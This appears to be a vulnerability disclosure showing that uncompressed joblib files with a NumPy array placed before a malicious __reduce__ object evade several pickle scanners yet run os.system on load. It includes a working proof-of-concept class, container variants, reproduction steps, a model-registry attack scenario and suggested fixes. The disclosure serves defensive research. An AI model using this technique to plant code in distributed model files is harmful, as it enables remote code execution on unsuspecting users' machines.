| # Joblib Scanner Bypass via Inline NumPy Array Bytes |
|
|
| ## Summary |
|
|
| A malicious `.joblib` file containing `os.system` RCE achieves **0/4 scanner detection** (picklescan, modelscan, modelaudit, ClamAV (local)) while executing arbitrary commands on `joblib.load()`. The evasion requires no payload obfuscation β the dangerous `os.system` global is present in plaintext opcodes β but scanners never reach it because inline raw NumPy array bytes cause a mid-stream parse failure that all scanners treat as "clean." |
|
|
| **Affected scanners:** picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2 |
| **Affected format:** Joblib (`.joblib`) β uncompressed, standard format |
| **Impact:** Arbitrary code execution at model load time, bypassing ProtectAI safety scan |
| **Environment:** Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0 |
|
|
| ## Vulnerability |
|
|
| ### Root Cause |
|
|
| joblib's `NumpyPickler` serializes NumPy arrays by writing raw array bytes **inline in the pickle stream**, between standard pickle opcodes. joblib's `NumpyUnpickler` knows how to skip past these bytes (it overrides the `BUILD` opcode handler to call `wrapper.read_array()` which advances the file cursor). However, pickle scanners use `pickletools.genops` or equivalent opcode walkers that are **not aware** of these inline raw bytes. When the scanner hits a raw float/int byte mid-stream, it misinterprets it as a pickle opcode, fails with a `ValueError`, and **silently returns "clean"** instead of flagging the parse failure. |
|
|
| If an attacker places a malicious `__reduce__` object **after** a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly, executing the payload. |
|
|
| ### Attack Requirements |
|
|
| 1. A pickle container (tuple, list, dict, or nested) serialized via `joblib.dump` |
| 2. At least one NumPy ndarray (any dtype, β₯1 element) positioned **before** the malicious object in pickle traversal order |
| 3. A malicious object with `__reduce__` returning a dangerous callable (e.g., `os.system`) |
|
|
| ### Why This Is Not the Known Joblib Compression Bypass |
|
|
| The previously reported joblib bypass (PickleCloak Appendix B.1) involves **compressed** joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses **uncompressed, standard-format** joblib files. The parse failure occurs **mid-stream** due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different. |
|
|
| ## Files |
|
|
| | File | Description | |
| |------|-------------| |
| | `malicious_model.joblib` | PoC: fitted LinearRegression + malicious CustomLR in a tuple. 648 bytes. | |
| | `poc_generate.py` | Generates the malicious .joblib file | |
| | `poc_verify.py` | Scans with all scanners and loads to confirm RCE | |
| | `generalized_poc.py` | 8 additional variants proving generalization (no sklearn needed) | |
|
|
| ## Reproduction |
|
|
| ### Step 1: Install dependencies |
|
|
| ```bash |
| pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling |
| ``` |
|
|
| ### Step 2: Generate the PoC (or use the provided `malicious_model.joblib`) |
| |
| ```bash |
| python poc_generate.py |
| ``` |
| |
| ### Step 3: Scan β observe all scanners report clean |
| |
| ```bash |
| picklescan --path malicious_model.joblib |
| # Expected: 0 infected files, 0 dangerous globals |
| |
| modelscan -p malicious_model.joblib |
| # Expected: No issues found |
|
|
| python -c " |
| from modelaudit.core import scan_model_directory_or_file |
| result = scan_model_directory_or_file('malicious_model.joblib') |
| print('malicious:', result.get('malicious', False)) |
| print('verdict:', result.get('pickle_verdict', False)) |
| " |
| # Expected: malicious: False, verdict: False |
| ``` |
| |
| ### Step 4: Load β observe code execution |
| |
| ```bash |
| python -c "import joblib; joblib.load('malicious_model.joblib')" |
| # Expected output includes: This is a malicious payload! |
| ``` |
| |
| ### Step 5: Verify with controls |
| |
| ```bash |
| python poc_verify.py |
| # Runs full matrix: bypass cases (clean) vs control cases (detected) |
| ``` |
| |
| ## Scanner Results |
| |
| ### Bypass case: `(fitted_LinearRegression, malicious_CustomLR)` |
| |
| | Scanner | Version | Verdict | Detects `os.system`? | |
| |---------|---------|---------|---------------------| |
| | picklescan | 1.0.4 | **0 infected** | No β parse aborts before reaching REDUCE | |
| | modelscan | 0.8.8 | **No issues found** | No β parse aborts silently | |
| | modelaudit | 0.2.45 | **malicious: False** | No β logs WARNING but verdict stays safe | |
| | fickling | 0.1.11 | LIKELY_OVERTLY_MALICIOUS | No β flags NumpyArrayWrapper (fires on ALL fitted joblib files, including benign ones) | |
| | ClamAV | 1.5.2 | **CLEAN** | No β signatures gated on ZIP/torch container | |
| |
| ### Control case: `(malicious_CustomLR, fitted_LinearRegression)` β reversed tuple order |
| |
| | Scanner | Version | Verdict | Detects `os.system`? | |
| |---------|---------|---------|---------------------| |
| | picklescan | 1.0.4 | **Dangerous** | Yes β REDUCE precedes array bytes | |
| | modelscan | 0.8.8 | **No issues found** | No β modelscan is fail-open even when dangerous global was already observed | |
| | modelaudit | 0.2.45 | **CRITICAL** | Yes β REDUCE precedes array bytes | |
| |
| Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue. |
| |
| ## Generalization |
| |
| The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example: |
| |
| ```python |
| import numpy as np |
| import joblib |
|
|
| class Detonator: |
| def __reduce__(self): |
| import os |
| return (os.system, ('echo PWNED',)) |
| |
| # Any numpy array before the malicious object triggers the bypass |
| joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib') |
| |
| # Scanners: clean. Loader: executes 'echo PWNED' |
| ``` |
| |
| Tested container shapes (all bypass 4/5 scanners): |
| - `(np.array([1.0]), Detonator())` |
| - `[np.array([1.0, 2.0, 3.0]), Detonator()]` |
| - `{"data": np.array([1.0]), "evil": Detonator()}` |
| - `{"outer": (np.array([1.0]), Detonator())}` |
| - `(np.zeros(10, dtype=np.int64), Detonator())` |
| |
| ## Real-World Impact |
| |
| This bypass affects every fitted scikit-learn model saved with `joblib.dump`. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. An attacker can: |
| |
| 1. Take a legitimate fitted sklearn model |
| 2. Bundle it with a malicious `__reduce__` object in a tuple |
| 3. Upload to HuggingFace or any model registry |
| 4. ProtectAI's ModelScan reports "No issues found" |
| 5. Victim downloads and calls `joblib.load()` β RCE |
| |
| ## Suggested Fixes |
| |
| ### For scanner maintainers (picklescan, modelscan, modelaudit): |
| |
| 1. **Fail-closed on parse abort.** Any `pickletools.genops` mid-stream exception should be treated as CRITICAL/suspicious, not silently clean. |
| 2. **Format-aware parsing.** Recognize `joblib.numpy_pickle.NumpyArrayWrapper` in the opcode stream and consume the documented inline-bytes region instead of interpreting raw array bytes as opcodes. |
|
|
| ### For joblib maintainers: |
|
|
| 1. Document the inline-bytes protocol so scanner authors can implement format-aware walkers. |
| 2. Consider providing a `joblib.safe_load(path, *, allowed_globals)` analogous to PyTorch's `weights_only=True`. |
|
|